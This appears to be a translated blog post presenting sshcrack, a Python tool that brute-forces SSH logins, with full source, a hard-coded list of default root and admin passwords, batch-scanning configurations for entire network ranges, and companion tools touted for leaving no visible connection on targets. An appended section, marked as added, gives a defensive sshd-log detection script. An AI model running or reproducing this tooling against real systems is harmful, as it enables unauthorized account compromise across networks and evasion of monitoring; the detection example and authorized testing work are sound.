[Original] Internal-network SSH password brute-force tool sshcrack (used with Cscan for batch weak-password detection)

0x000 Foreword

sshcrack is a command-line SSH password brute-force tool, suited to SSH password detection during internal-network penetration testing.

Of course, it can also be used for SSH password brute-forcing over the external network. It supports Windows and Linux; other systems are untested (see Tip1).

0x001 Contents

1. sshcrack usage

2. Cscan batch scanning

3. Connecting over SSH and running commands

4. sshcrack source

5. Download

0x002 Usage

Password detection against a specified SSH server

Weak-password detection (-crack: the user and password arguments can be anything, because the account/password list is hard-coded)
C:\Users\K8team\Desktop\Upload>sshcrack.exe 192.168.1.106 22 root k8gege -crack
192.168.1.106 22 root toor LoginOK

Single password verification (-test)
C:\Users\K8team\Desktop\Upload>sshcrack.exe 192.168.1.106 22 root toor -test
192.168.1.106 22 root toor LoginOK

 

0x003 Batch SSH server password detection

0. Place Cscan.exe, Cscan.ini and sshcrack.exe in the same directory.

Cscan.ini is as follows:

1. Brute-forcing weak passwords (when no password is known yet, or several account/password pairs have been obtained)

[Cscan]
exe=sshcrack.exe
arg=$ip$ 22 "" "" -crack

2. Verifying a known password (quickly checks whether other machines on the internal network use the same account and password)

[Cscan]
exe=sshcrack.exe
arg=$ip$ 22 root k8gege -test

3. Cscan: scanning a single machine, or a C / B / A segment

cscan 192.168.1.108 (single IP)
cscan 192.168.1.108/24 (C segment)
cscan 192.168.1.108/16 (B segment)
cscan 192.168.1.108/8 (A segment)

4. Cscan: batch scanning of IP lists / multiple C segments / multiple B segments

Create an ip24.txt, ip16.txt or ip.txt file, then run Cscan (no other parameters are needed).

The Cscan.ini below does not specify a port, because K8portscan identified SSH on ports other than 22.

Not specifying a port means ip.txt must contain the corresponding SSH port for each entry.

0x004 Connecting over SSH and running commands

1. sshshell interactive connection

sshshell.exe 192.168.1.106 22 root toor

sshshell.exe is a single-file interactive SSH connection tool (advantage: like PuTTY, it can keep a session; drawback: like PuTTY, the connection stays open).

2. sshcmd non-interactive command line

Its advantage is that the session is logged out as soon as the command finishes (i.e., no network connection is visible on the target); it is built for penetration work.

3. Penetration-edition SSH connection tool, GUI version

The advantage is likewise that the session is logged out as soon as a command finishes (i.e., no network connection is visible on the target); it is built for penetration work, and can connect to SSH from the internal network through a proxy or over the external network.

Of course, it can also be used for day-to-day VPS management; the GUI version includes file management and supports uploading and downloading single files or entire directories.

 

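0x005 sshcrack source

Hard-coding the passwords is recommended so that batch scanning with Cscan is easy; otherwise sshcrack has to read the password list again for every host scanned, which may reduce batch efficiency.

The following is an example; you can modify it yourself and add a password dictionary suited to your own project. The script still needs improvement, for example stopping checks for the root user, or stopping brute-forcing altogether, once the root password has been found.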

#sshcrack 1.0
#author: k8gege
#https://www.cnblogs.com/k8gege
#https://github.com/k8gege
import paramiko
import sys
import logging

ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
logging.raiseExceptions=False
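def checkSSH(host,port,user,pwd):
	# Try one username/password pair; print a LoginOK line if the server accepts it.
	try:
		ssh.connect(host,port,user,pwd)
		print(host+' '+port+' '+user+' '+pwd+' LoginOK')
		# checkDns() and checkPing() are called here in the original listing but are
		# not defined on this page; the bare except below swallowed the NameError.
	except:
		# Any failure (authentication, network, timeout) is silently ignored.
		pass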
host=sys.argv[1]
port=sys.argv[2]
user=sys.argv[3]
pwd=sys.argv[4]
type=sys.argv[5]
if type=='-test':
	checkSSH(host,port,user,pwd)
elif type=='-crack':
	checkSSH(host,port,'root','123456')
	checkSSH(host,port,'root','cisco')
	checkSSH(host,port,'root','Cisco')
	checkSSH(host,port,'admin','123456')
	checkSSH(host,port,'cisco','123456')
	checkSSH(host,port,'cisco','cisco')
	checkSSH(host,port,'Cisco','Cisco')
	checkSSH(host,port,'cisco','cisco123')
	checkSSH(host,port,'admin','admin')
	checkSSH(host,port,'root','Admin')
	checkSSH(host,port,'root','toor')
	checkSSH(host,port,'root','Admin123')
	checkSSH(host,port,'root','system')
	checkSSH(host,port,'root','system123')
	checkSSH(host,port,'root','System')
	checkSSH(host,port,'root','System123')
	checkSSH(host,port,'root','Admin123!@#')
	checkSSH(host,port,'root','root123!@#')
	checkSSH(host,port,'root','root2019')
	checkSSH(host,port,'root','root2018')
	checkSSH(host,port,'root','root2017')
	checkSSH(host,port,'root','root2016')
	checkSSH(host,port,'root','root2015')
	checkSSH(host,port,'root','root2014')
	checkSSH(host,port,'root','root2013')
	checkSSH(host,port,'root','root2012')
else:
	checkSSH(host,port,user,pwd)
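
What a run of the -crack list looks like from the target's side, as an added detection example that is not part of the original post or the k8gege tools: it assumes OpenSSH sshd syslog lines, and the function names, thresholds, assumed year and sample log are hypothetical or constructed.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

LINE_RE = re.compile(
    r"^(\w{3}\s+\d+ [\d:]{8}) (\S+) sshd\[\d+\]: (Failed|Accepted) password "
    r"for (?:invalid user )?(\S+) from (\S+) port \d+")
ASSUMED_YEAR = 2019  # syslog timestamps carry no year; assumed for parsing


def find_guessing(log_text, min_failures=5, window=timedelta(seconds=60)):
    """Flag (host, source) pairs with >= min_failures failed passwords inside
    `window`, and note any login accepted from that source after the burst."""
    per_pair = defaultdict(list)
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if m:
            ts, host, result, user, src = m.groups()
            when = datetime.strptime(f"{ASSUMED_YEAR} {ts}", "%Y %b %d %H:%M:%S")
            per_pair[(host, src)].append((when, result, user))
    findings = {}
    for pair, events in per_pair.items():
        recent, users, burst, accepted = deque(), set(), False, None
        for when, result, user in sorted(events):
            if result == "Failed":
                recent.append(when)
                users.add(user)
                while when - recent[0] > window:
                    recent.popleft()  # drop failures older than the window
                burst = burst or len(recent) >= min_failures
            elif burst and accepted is None:
                accepted = user  # success after a guessing burst: treat as compromise
        if burst:
            findings[pair] = {"users_tried": sorted(users), "accepted_as": accepted}
    return findings


def sample_log():
    """Constructed sshd lines: 192.0.2.50 guesses on web01; 192.0.2.9 is one typo."""
    guesses = [("root", "Failed"), ("root", "Failed"), ("admin", "Failed"),
               ("cisco", "Failed"), ("root", "Failed"), ("root", "Accepted")]
    lines = [f"Jun 10 03:14:{i:02d} web01 sshd[{900 + i}]: {res} password for "
             f"{'invalid user ' if user == 'cisco' else ''}{user} "
             f"from 192.0.2.50 port {50000 + i} ssh2"
             for i, (user, res) in enumerate(guesses)]
    lines.append("Jun 10 09:00:00 web01 sshd[990]: Failed password for deploy from 192.0.2.9 port 40022 ssh2")
    lines.append("Jun 10 09:00:09 web01 sshd[991]: Accepted password for deploy from 192.0.2.9 port 40023 ssh2")
    return "\n".join(lines)


if __name__ == "__main__":
    print(find_guessing(sample_log()))
```

A finding whose `accepted_as` is set is the server-side counterpart of a LoginOK line and warrants rotating that account's password and reviewing the session.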

0x006 Tool download

https://github.com/k8gege/sshshell

https://github.com/k8gege/K8tools

https://github.com/k8gege/K8CScan

 

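Tip1: Is a program written in Python necessarily cross-platform?

Python is a cross-platform language, but a program written in Python does not necessarily support every system.

Whether it does depends mainly on the person writing the code; for example, some dependency packages are only available on Linux or only on Windows.

If you call someone else's package directly, without any modification, do you think it is necessarily cross-platform???

Even functionality written using only built-in packages is not guaranteed to be fully compatible.

Some functionality needs different handling on different systems.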

 

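Tip2: Detailed description of the SSH connection tools

[Original] SSH connection tools for internal-network penetration: sshcmd/sshshell/ssh password cracking, and enabling SSH on Kali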

https://www.cnblogs.com/k8gege/p/10991264.html

 

Origin www.cnblogs.com/k8gege/p/10995625.html